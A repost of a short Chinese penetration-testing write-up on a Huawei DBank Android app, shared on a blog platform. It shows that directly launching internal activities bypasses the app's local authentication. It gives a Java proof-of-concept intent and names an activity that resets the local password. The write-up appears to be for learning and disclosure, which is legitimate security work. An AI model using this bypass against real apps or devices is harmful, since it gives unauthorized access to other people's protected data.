android客户端渗透测试案例一

android客户端渗透测试案例一

本文为网络收集,如有侵权联系删除,仅供学习使用

0x01 Root

root的话直接看私有文件就可以了,做个简单加密嗮。

0x02 非Root

2.非root的话直接启动其他activity即可绕过认证,本地认证只是简单topActivity。

poc如下

public void activityStart(View v) { ComponentName componetName = new ComponentName("com.huawei.dbank.v7", "com.huawei.dbank.v7.ui.newbietask.NewbieTaskActivity"); try { Intent intent = new Intent(); intent.setComponent(componetName); startActivity(intent); } catch (Exception e) { Toast.makeText(getApplicationContext(), "Not found", 0).show(); } }

0x03 启动activity

启动com.huawei.dbank.v7.ui.newbietask.NewbieTaskActivity这个activity组件再返回即可进入主界面。

0x04

启动设置本地的密码的activity:com.huawei.dbank.v7.ui.setting.LocalPassWordInitActivity,即可重置本地密码

原文发布于微信公众号 - 网络安全社区悦信安(yuexin_an)

原文发表时间:2018-01-14

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏蘑菇先生的技术笔记

Go中原始套接字的深度实践

原始套接字(raw socket)是一种网络套接字,允许直接发送/接收更底层的数据包而不需要任何传输层协议格式。平常我们使用较多的套接字(socket)都是基于...

24020
来自专栏移动开发的那些事儿

TCP问题分析

![tcp1.jpg](http://upload-images.jianshu.io/upload_images/1609288-0260d9484b...

21930
来自专栏PHP在线

服务器常用端口

web 的端口 80 FTP的端口是 21 SSH (Secure Shell)服务使用tcp 22 端口 TELNET 23 端口 DHCP server...

402100
来自专栏FreeBuf

T50:一款优秀的网站压力测试工具

T50是一款网络层压力测试工具。 该工具在检查完“/usr/include/linux”之后,会选择下面的协议进行测试: a) ICMP – Interne...

45160
来自专栏SDNLAB

源码解读ODL与OpenFlow交换机建立过程

编者按:OpenDaylight两大技术特色:1.采用了OSGi框架;2.引入了SAL,而今天我们主要介绍服务抽象层(SAL)适配的南向协议之一OF协议模块。 ...

38540
来自专栏惨绿少年

网络基础二 tcp/ip协议簇 端口 三次握手 四次挥手 11种状态集

第1章 概念介绍 1.1 VLAN 1.1.1 什么是VLAN VLAN(Virtual LAN),翻译成中文是“虚拟局域网”。LAN可以是由少数几台家用计算...

23000
来自专栏FreeBuf

利用PRET控制远程打印机测试

Pret是用来对打印机安全进行测试的工具。它通过网络或者USB连接到设备,并利用给定打印机的语言进行渗透。目前绝大多数的打印机都是使用PostScript,pj...

19630
来自专栏LIN_ZONE

laravel的csrf token 的了解及使用

之前在项目中因为没有弄清楚csrf token的使用,导致发请求的话,一直请求失败,今天就一起来看一下csrf的一些东西。

1.3K20
来自专栏微服务

pom.xml配置文件中所有标签及作用简单描述

** 我转载的是关于pom.xml文件中会使用到的基本上所有的标签以及标签的作用简单描述。 可能我们自己的项目所使用到的标签总数量不及此文的一半。 我转载仅...

37560
来自专栏Jerry的SAP技术分享

ABAP Netweaver, SAP Cloud Platform和Kubernetes的用户区分

用户帐户为用户提供账户标识,而服务账户为计算机进程和Kubernetes集群中运行的

10820

扫码关注云+社区

领取腾讯云代金券